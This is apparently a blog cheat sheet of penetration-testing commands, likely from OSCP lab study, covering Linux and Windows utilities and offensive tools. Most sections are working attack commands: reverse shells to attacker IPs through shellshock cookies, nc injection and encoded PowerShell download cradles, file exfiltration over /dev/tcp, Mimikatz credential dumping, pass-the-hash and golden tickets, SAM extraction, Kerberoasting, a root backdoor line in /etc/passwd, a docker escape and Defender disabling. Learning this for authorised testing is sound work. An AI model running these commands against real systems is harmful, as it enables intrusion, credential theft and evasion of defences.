Tools && Command

Some commonly used tools and commands

Linux

  • Base
    • : split
    • Python3 Creation of virtual environments
    • OpenVPN
    • Json validate and pretty-print(Python module)
    • Json validate and pretty-print(jq command)
    • rlwrap
    • stty
    • Multiple lines to one line
    • rdesktop
    • wget https
    • nc port scan
    • Quick file transfer
  • awk
  • sed
  • mount

: split

cut -d ":" -f 1

Python3 Creation of virtual environments

python3 -m venv $(pwd)
source bin/activate

# exit
deactivate

OpenVPN

sudo openvpn --config OSCP-00000.ovpn --daemon

Json validate and pretty-print

python -m json.tool out.json

cat out.json | python -m json.tool

jq JSON validate and pretty-print

# ffuf ... -o output.json
cat output.json | jq '.results[0].url'

rlwrap

rlwrap nc -lvnp 9999

stty

# Tab completion in a reverse shell (a more comfortable reverse shell)

# On the controlled machine
python -c 'import pty; pty.spawn("/bin/bash")'

# ^Z / Ctrl+Z to put the shell in the background
stty raw -echo

# Back to the controlled machine (what you type for fg is not echoed)
fg

# Press Enter twice
# Set the env on the controlled machine
export TERM=xterm-256color

Multiple lines to one line

# Multiple lines to one line
cat sqlserver.hash | xargs | sed -e 's/ //g'

rdesktop

rdesktop -u carol -p xxxxxxx 127.0.0.1 -r clipboard:CLIPBOARD -g 3584x2240@200

wget https

wget --no-check-certificate https://www.exploit-db.com/download/28806 -O 28806.zip

Nc Port Scan

nc -zvn -w 1 10.3.3.14 20-1000 2>&1 | tee port.txt

Quick file transfer

# Attacker
nc -lvnp 4444 > file

# Victim
cat file > /dev/tcp/10.10.11.11/4444

awk

cat wordlists | awk 'length($1) > 4'

awk '{for(i=1;i<=NF;i++){print $i}}'

echo "user:name" | awk -F: '{print $1}'

sed

head -4 Prot.txt
# 1 10000/tcp
# 1 10243/tcp
# 1 1026/tcp
# 1 1028/tcp

cat Prot.txt | awk '{print $2}' | sort -un | xargs | sed -e 's/\/tcp//g' | sed -e 's/ /, /g'

# 21, 22, 25, 53, 80, 88, 110, 111, 113, 119, 135, 139, 143
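The same port-list transformation as a reusable shell function, added here as an example rather than taken from these notes; it reads the `uniq -c` style listing on stdin and also strips /udp suffixes, which the one-liner above does not:

```shell
#!/bin/sh
# Added example (not from the original notes): turn a "count port/proto"
# listing, as produced by `sort | uniq -c`, into a comma-separated list of
# unique ports in numeric order. Unlike the one-liner above it strips both
# /tcp and /udp suffixes.
ports_csv() {
    awk '{print $2}' |                      # keep only the port/proto field
    sed -e 's#/tcp$##' -e 's#/udp$##' |     # drop the protocol suffix
    sort -un |                              # numeric order, duplicates removed
    paste -s -d ',' - |                     # join onto one line
    sed -e 's/,/, /g'                       # "21, 22, 80" style spacing
}

# Constructed sample input in the same shape as the page's Prot.txt
SAMPLE='      1 10000/tcp
      3 22/tcp
      1 80/tcp
      2 22/udp
      1 53/udp'

# Wrapper so the sample run can be called (and checked) by name
ports_csv_sample() {
    printf '%s\n' "$SAMPLE" | ports_csv
}

ports_csv_sample   # prints 22, 53, 80, 10000
```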

Delete the line starting with evil

sed -i "/^evil/d" /etc/passwd

Hide the line starting with evil (original file unchanged)

sed -e "/^evil/d" /etc/passwd

Replace the line containing the string evil (note the /c command)

sed -i '/evil/cevil:xxxx' pass

# r : xxxx:evil
# n : evil:xxxx

mount

mount -t cifs -o user=luke //10.11.x.x/share /mnt/<local_folder>
mount -t cifs //10.11.x.x/'Bob Share' /mnt/smb -o rw,vers=1.0,dir_mode=0777,file_mode=0666,nounix

Windows

  • Base
    • PATH List
    • Split string with
    • Set Windows PATH For The Current Session
    • rundll32
    • cmdkey list
    • service start/stop
    • whoami
    • Add users to the group
    • look at the domain's account policy (Low and Slow Password Guessing)
    • delete file/folder
    • findstr color
    • where
    • setspn
    • tasklist
    • firewall
    • runas
    • Extracting the SAM database
  • Powershell
    • Powershell Like Grep
    • Powershell ExecutionPolicy
    • Run command in background
    • Target architecture
    • Copy to a remote computer
    • Remote to local computer
    • like find . / ls -al
    • PSCredential plain-text passwd
    • New-PSDrive Remote Computer
    • Port Scan
    • Find Keyword
    • Disable/Enable Windows Defender

PATH List

echo %PATH:;=&echo.%

# powershell
$env:PATH

Split string with

$p=$env:PATH
$p.Split(";")

# %SystemRoot%\system32\WindowsPowerShell\v1.0\
# C:\Windows\system32
# C:\Windows
# C:\Windows\System32\Wbem
# C:\Windows\System32\WindowsPowerShell\v1.0\

Set Windows PATH For The Current Session

set PATH=%PATH%;C:\path\to\directory\

# powershell: PATH entries are separated by ';', so include the separator
# unless the existing PATH already ends with one
$env:PATH += ";C:\Users\0x20C\Desktop\Pentest\Sigcheck\"

rundll32

# dll, function name, arguments
rundll32.exe open_cmd_dll.dll,InvokeCmd

cmdkey list

cmdkey /list

service start/stop

net stop service && net start service

whoami

whoami /groups

whoami /priv

Add users to the group

net localgroup "Remote Desktop users" evil /add
net localgroup "Debugger Users" evil /add

# winrm (evil-winrm)
net localgroup "Remote Management Users" evil /add

look at the domain’s account policy

# Lockout threshold
# Lockout observation window (minutes)
net accounts

# Low and Slow Password Guessing
# Spray-Passwords.ps1

delete file/folder

del re.exe
rd /s /q C:\tools

rd folder

findstr color

findstr /n /i /a:6 /s "Password" config.xml

where

where /r C:\windows eventvwr.exe
# C:\Windows\System32\eventvwr.exe
# C:\Windows\SysWOW64\eventvwr.exe

setspn

setspn -T SV-DC01 -Q */*

tasklist

tasklist
taskkill /PID 1864 /F
taskkill /IM shell.exe /F

firewall

netsh firewall show state
# Port
netsh firewall show portopening
netsh firewall show currentprofile
netsh firewall show config

runas

cmdkey /add:domain /user:USER /pass:PASS
cmdkey /delete:Domain:interactive=BETHANY\alice

runas /savecred /user:alias cmd.exe

Extracting the SAM database

reg save hklm\sam C:\SAM
reg save hklm\system C:\SYSTEM
reg save hklm\security C:\SECURITY

Powershell

Powershell like grep

Select-String -Pattern "requestedExecutionLevel" -Context 0,2

Powershell ExecutionPolicy

powershell.exe -Nop -ExecutionPolicy Bypass -File C:\Windows\System32\spool\drivers\color\ps.ps1
powershell.exe -Nop -ep Bypass -File C:\Windows\System32\spool\drivers\color\ps.ps1

Run command in background

# cmd
start /b powershell -nop -enc SQBFA...

# powershell
# Invoke-Command -AsJob
Invoke-Command -AsJob -ComputerName XOR-APP23 -Credential $crel -ScriptBlock { powershell -nop -enc SQB... }

# Jobs list
Get-Job

Target architecture

$ENV:PROCESSOR_ARCHITECTURE

[IntPtr]::Size
# 4 => 32bit
# 8 => 64bit

New-PSSession

$session = New-PSSession -ComputerName XOR-APP23 -Credential $crel

Get-PSSession

Copy to a remote computer

Copy-Item "C:\files\mimikatz.exe" -Destination "C:\Users\Public\Documents\" -ToSession $session -Recurse

Remote to local computer

Copy-Item "C:\Users\ik.ps1" -Destination "C:\Documents\" -FromSession $session -Recurse

like find . / ls -al

Get-ChildItem -Path . -Recurse -Force

PSCredential plain-text passwd

$password = ConvertTo-SecureString 'MySecretPassword' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential ('root', $password)

# Get plain-text passwd
$credential.GetNetworkCredential()
$credential.GetNetworkCredential().Password

New-PSDrive Remote Computer

smbserver.py -smb2support -username admin -password 123456 shareme $(pwd)
# null passwd
New-PSDrive -Name evil -PSProvider FileSystem -Root \\192.168.119.167\shareme

# Use passwd
$sp = ConvertTo-SecureString '123456' -AsPlainText -Force

# build the credential object from the share username and the secure-string password
$cred = New-Object System.Management.Automation.PSCredential ('admin', $sp)
New-PSDrive -Name evil -PSProvider FileSystem -Credential $cred -Root \\192.IP\shareme

Remove-PSDrive -Name evil

Get-PSDrive

Port Scan

$ports = "21 22 25 53 80 111 139 443 445 3306 3389 8000 8080"
$ip = "192.168.0.100"
$ports.split(" ") | % {echo ((new-object Net.Sockets.TcpClient).Connect($ip,$_)) "Port $_ is open on $ip"} 2>$null

Find Keyword

gci C:\www -Include *.txt,*.xml,*.config,*.conf,*.cfg,*.ini -File -Recurse -EA SilentlyContinue | Select-String -Pattern "password"

Disable/Enable Windows Defender

# Disable
Set-MpPreference -DisableRealtimeMonitoring $true

# Enable
Set-MpPreference -DisableRealtimeMonitoring $false

Tools

  • Port Scan
    • Nmap
    • Masscan
  • Mimikatz
  • PsExec
  • JuicyPotato
  • SMB
    • psexec.py
    • wmiexec.py
    • crackmapexec
    • smbclient
  • Password
    • hashcat
    • cewl
    • hydra
  • MSF
    • msfconsole
  • Hash
  • Web
    • Scan
    • Dir Enum
    • Password Attack
    • SQL Injection
  • Ldap

Port Scan

Nmap

nmap -sU -sV --top-ports 100 -oA nmap/top_100_udp 10.11.1.44

proxychains4 nmap -Pn -sT -sC -sV -oA nmap/full 10.1.xx.x

Masscan

masscan -p1-65535,U:1-65535 10.11.1.111 --rate=1000 -e tun0 > ports

Mimikatz

# system priv
mimikatz.exe "lsadump::sam" exit

mimikatz.exe "lsadump::secrets" exit

mimikatz.exe "kerberos::list /export" "exit"

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

# history0 is the last changed passwd
mimikatz.exe "lsadump::setntlm /user:USER /ntlm:NTLM" exit

# MsCacheV2
mimikatz.exe "privilege::debug" "token::elevate" "lsadump::cache" "exit"

# log
mimikatz.exe "log" "privilege::debug" "token::elevate" "lsadump::dcsync /user:Krbtgt" "exit"

mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::msv" "exit"

# cmdkey
mimikatz.exe "vault::cred" "exit"

# pth
mimikatz.exe "sekurlsa::pth /user:alice /domain:SVCORP.COM /ntlm:xxx04xx6B8F7B2A3B6C47780xxxxxxxx /run:C:\Windows\System32\spool\drivers\color\re9.exe" "exit"

mimikatz.exe "kerberos::golden /user:evil /domain:corp.com /sid:S-1-5-21-x-x-x /rc4:7xxx5 /ptt"
mimikatz.exe "kerberos::golden /user:evil /domain:corp.com /sid:S-1-5-21-x-x-x /target:xxx.corp.com /service:HOST /krbtgt:7xxx5 /ptt"
mimikatz.exe "misc::cmd"

PsExec

local cmd

PsExec64.exe -i -u awsl -p callme1234 C:\Windows\System32\cmd.exe

JuicyPotato

# JuicyPotato reverse shell
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.167 LPORT=4445 -f exe -o re.exe
# CLSID : https://ohpe.it/juicy-potato/CLSID/
cmd /c 'JuicyPotato.exe -l 1234 -p re.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820}'

SMB

psexec

psexec.py -hashes :700a8c186d267b607559db7xxxxxxxxxx Administrator@10.11.1.13

wmiexec.py -hashes :700a8c186d267b607559db7xxxxxxxxxx Administrator@10.11.1.13

crackmapexec

crackmapexec smb 10.11.x.x -u Administrator -H xxxxxxxxxxHash

crackmapexec smb 10.11.x.x -u USER.list -p PASSWD.list

smbclient

smbclient ////10.11.1.13//share
smbclient //10.11.1.13/share
smbclient -L 10.11.1.231
smbclient //share/home -I 192.10.2.11 -N

Password

hashcat --force --stdout -a 6 year.pass ?d?d?d?d?s > result.pass

proxychains cewl -m 3 -a --with-numbers http://10.11.1.x -w cewl.txt

hydra -I -l root@localhost -P cewl.txt 10.11.1.xx http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=240&User=^USER^&Password=^PASS^:F=Login failed"

MSF

msfconsole

portfwd add -l 8888 -p 445 -r 10.11.1.14
portfwd add -l 445 -p 445 -r 10.11.1.14

# msf portfwd
# [*] Local TCP relay created: :8888 <-> 10.11.1.14:445
# localhost:8888 --> 10.11.1.14:445

Suggester

use post/multi/recon/local_exploit_suggester

UAC

use exploit/windows/local/bypassuac_sdclt
getsystem

Kiwi

# note the quoting
kiwi_cmd '"sekurlsa::tickets /export"'

Search

search handler type:exploit
search cve:2007-2446

Upload File

upload /tmp/callme.vbs C:\callme.vbs

Route

meterpreter > run get_local_subnets
# Local subnet: 10.12.1.0/255.255.255.0

meterpreter > run autoroute -s 10.12.1.0/255.255.255.0

meterpreter > run autoroute -p

Modules

$HOME/.msf4/modules

searchsploit 45269

PATH
-----------------------
windows/local/45269.rb

copy to modules

mkdir -p $HOME/.msf4/modules/windows/local

searchsploit -m windows/local/45269.rb

Hash

Extracting hash from SAM(local)

reg save hklm\sam C:\SAM
reg save hklm\system C:\SYSTEM
reg save hklm\security C:\SECURITY

impacket-secretsdump -system system -sam sam -security security LOCAL

List history passwd

# List history passwd
secretsdump.py -just-dc -history -hashes LM:NTLM Administrator@10.11.x.x

Web

Scan

nikto -host http://10.11.1.39 -o nikto.json -Format json -Display P
nikto -host http://10.11.1.39 -Plugins robots

# dir_traversal,clientaccesspolicy,msgs,shellshock,robots,
# content_search,httpoptions,put_del_test,sitefiles,strutshock

Dir Enum

ffuf -c -t 30 -fc 403 -w wordlists:DIR -w extensions:EX -u https://127.0.0.1/DIR.EX -o out

# Wordlists -> /usr/share/seclists/fuzz/*
wfuzz -c -u http://10.10.10.79/api/get -w /path/to/wordlists -d '{"name": "FUZZ"}'

# Proxy -> burp
wfuzz -c -u http://10.10.10.79/api/get -w /path/to/wordlists -d '{"name": "FUZZ"}' -p 127.0.0.1:8080:HTTP

feroxbuster --depth 2 -u http://10.11.1.xx/php/ -x php,txt,conf,cgi -t 50

Password Attack

hydra -I -l root@localhost -P cewl.txt 10.11.1.xx http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=240&User=^USER^&Password=^PASS^:F=Login failed"

SQL Injection

sqlmap -u http://10.11.1.x/login-off.asp --data='txtLoginID=admin&txtPassword=admin&cmdSubmit=Login' --skip='cmdSubmit' --dbms='Microsoft SQL Server' --random-agent

Ldap

ldapsearch -LLL -x -H ldap://sv-dc01.svcorp.com -b '' -s base '(objectclass=*)'

Exploit

  • pseudo-terminal
  • searchsploit
  • shellshock attack
  • /etc/passwd is writable
  • powershell run .ps1 Script
  • NFS easy exploit
  • if missing ticket
  • Kerberoasting
  • Crack MsCacheV2(DCC2)
  • Unquoted Search Path
  • group in docker

pseudo-terminal

# start up
python -c "import pty;pty.spawn('/bin/bash')"
export SHELL=/bin/bash
alias ls='ls --color=auto'
alias ll='ls -alh --color=auto'
alias grep='grep --color=auto'
export TERM=xterm-256color

searchsploit

searchsploit --id MS17-017
searchsploit -m xxx
searchsploit --nmap allport.xml

shellshock attack

Cookie: () { :;}; /bin/bash -c 'whoami; id; ifconfig'
Cookie: () { :;}; /bin/bash -c 'exec bash -i &>/dev/tcp/192.168.119.167/4444 <&1'

/etc/passwd is writable

openssl passwd callme

echo "evil:NIk9BGd8Qt8dI:0:0:root:/root:/bin/bash" >> /etc/passwd

su evil

powershell run .ps1 Script

powershell -ep Bypass slui_bypass_uac.ps1
powershell -Exec Bypass slui_bypass_uac.ps1

NFS easy exploit

showmount -e 10.11.1.xx
# with vers=3 the listing shows the owner UID/GID
mount -t nfs -o vers=3 10.11.1.x:/home /tmp/home

# Permission denied
useradd test
# change the UID/GID in /etc/passwd to match the owner

# if the share is /home
mkdir .ssh
ssh-keygen -f target
cat target.pub > authorized_keys
cp authorized_keys /tmp/home/USER/.ssh/

ssh USER@10.11.1.x -i target

if missing ticket

# missing ticket
Invoke-Kerberoast.ps1
# or
Get-SPN.ps1

Kerberoasting / John / Hashcat

mimikatz.exe "kerberos::list /export" "exit"

# Convert *.kirbi to john
python /opt/kirbi2hashcat/kirbi2hashcat.py *.kirbi > hashcat/allhash.txt
python /usr/share/john/kirbi2john.py *.kirbi > john/alljohn.txt
# $krb5tgs$18$...

john --format=krb5tgs hashcat/allhash.txt -w=/usr/share/wordlists/rockyou.txt

# Convert *.kirbi to hashcat
# PowerShell-Empire - Invoke-Kerberoast - Hashcat format
# or Invoke-Kerberoast.ps1
Import-Module Invoke-Kerberoast.ps1
Invoke-Kerberoast -Domain xor.com -OutputFormat HashCat | Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt
# $krb5tgs$23$ ...

hashcat -m 13100 hashs/allhash.txt wordlist/rockyou.txt --force

# With credentials
$ python /opt/impacket/examples/GetUserSPNs.py -request xor.com/sqlserver -dc-ip 10.11.1.120
Password: xxxx

Crack MsCacheV2(DCC2)

john --format=mscash2 mscash2.hash -w=/usr/share/wordlists/rockyou.txt
# username:hash

hashcat -m 2100 hashs/mscash2.hash wordlist/rockyou.txt --force
# $DCC2$10240#username#HASH
# https://tinyapps.org/docs/domain-cached-credentials.html

Unquoted Search Path

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\windows"

# C:\Local\Bad Program\command.exe
# icacls "C:\Local"
# BUILTIN\Users:(W)

# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=80 -f exe -o Program.exe
# or
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.4 LPORT=80 -e x86/shikata_ga_nai -i 7 -f raw > met.bin
# Use shellter injection .bin in binary program (ex. whoami.exe)
# rename whoami.exe -> Bad.exe -> C:\Local\

group in docker

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Misc

i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32
i686-w64-mingw32-gcc 1198.c -o ms05-018.exe -lws2_32 advapi32.lib

# 64 bit and 32 bit
i686-w64-mingw32-gcc -o win32.exe win32.c
x86_64-w64-mingw32-gcc -o win64.exe win32.c

gcc -Wl,--hash-style=both -o exp exploit.c

Writable directory

# writable directory
C:\Windows\System32\spool\drivers\color

Readable file

# readable file
C:\Windows\win.ini

go cross-compiling for other OS/architectures

# GOOS : darwin, freebsd, linux, windows
# GOARCH : 386, amd64, arm

GOOS=linux GOARCH=amd64 go build -o linux_64
GOOS=linux GOARCH=386 go build -o linux_32

GOOS=windows GOARCH=amd64 go build -o win_64
GOOS=windows GOARCH=386 go build -o win_32

Nc one line

<!-- nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.16.3'$IFS'4444' -->
<img src=http://10.10.16.3/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.16.3'$IFS'4444') />

Note

# Quoting problem when calling PowerShell IEX() from cmd
# ...cmd('powershell "IEX()"')

powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.11.1.11/callme.ps1')"

echo "IEX(New-Object Net.WebClient).DownloadString('http://10.11.1.11/callme.ps1')" | iconv -t UTF-16LE | base64 -w 0

# SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMQAuADEALgAxADEALwBjAGEAbABsAG0AZQAuAHAAcwAxACcAKQAKAA==

powershell -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMQAuADEALgAxADEALwBjAGEAbABsAG0AZQAuAHAAcwAxACcAKQAKAA==

# PROGRA~1 = Program Files

cd "C:\Program Files\Windows Defender"
# or
cd "C:\PROGRA~1\Windows Defender"

MpCmdRun.exe -RemoveDefinitions -All

bash single vs double quotes

# history expansion of "!" still happens inside double quotes
echo -e "#!/bin/bash\nrm -rf /TMP/*" > cron
# bash: !/bin/bash\nrm: event not found

# single quotes prevent it
echo -e '#!/bin/bash\nrm -rf /TMP/*' > cron

cat cron
#!/bin/bash
rm -rf /TMP/*

echo -n

# wc also counts the trailing newline that echo adds
echo "63616c632e657865" | wc -c
# 17

echo -n "63616c632e657865" | wc -c
# 16

Little-endian display

echo "1120110D" | tac -rs .. | echo "$(tr -d '\n')"
# 0D112011
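A portable version of the byte swap above, added here as an example and not from these notes; it uses `fold` and `awk` instead of GNU `tac -rs`, and refuses odd-length or non-hex input:

```shell
#!/bin/sh
# Added example (not from the original notes): reverse the byte order of a
# hex string, e.g. to read a little-endian value the way it is laid out in
# memory. Uses fold/awk instead of GNU tac -rs, and rejects odd-length or
# non-hex input instead of silently producing garbage.
swap_bytes() {
    hex=$1
    case "$hex" in
        ""|*[!0-9A-Fa-f]*) return 1 ;;        # empty or non-hex characters
    esac
    [ $((${#hex} % 2)) -eq 0 ] || return 1    # must be whole bytes
    printf '%s' "$hex" |
    fold -w 2 |                               # one byte (two hex digits) per line
    awk '{ b[NR] = $0 }
         END { for (i = NR; i > 0; i--) printf "%s", b[i]; printf "\n" }'
}

swap_bytes 1120110D   # prints 0D112011
```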

All articles on this blog, unless otherwise stated, are licensed under CC BY-SA 4.0; please credit the source when reposting!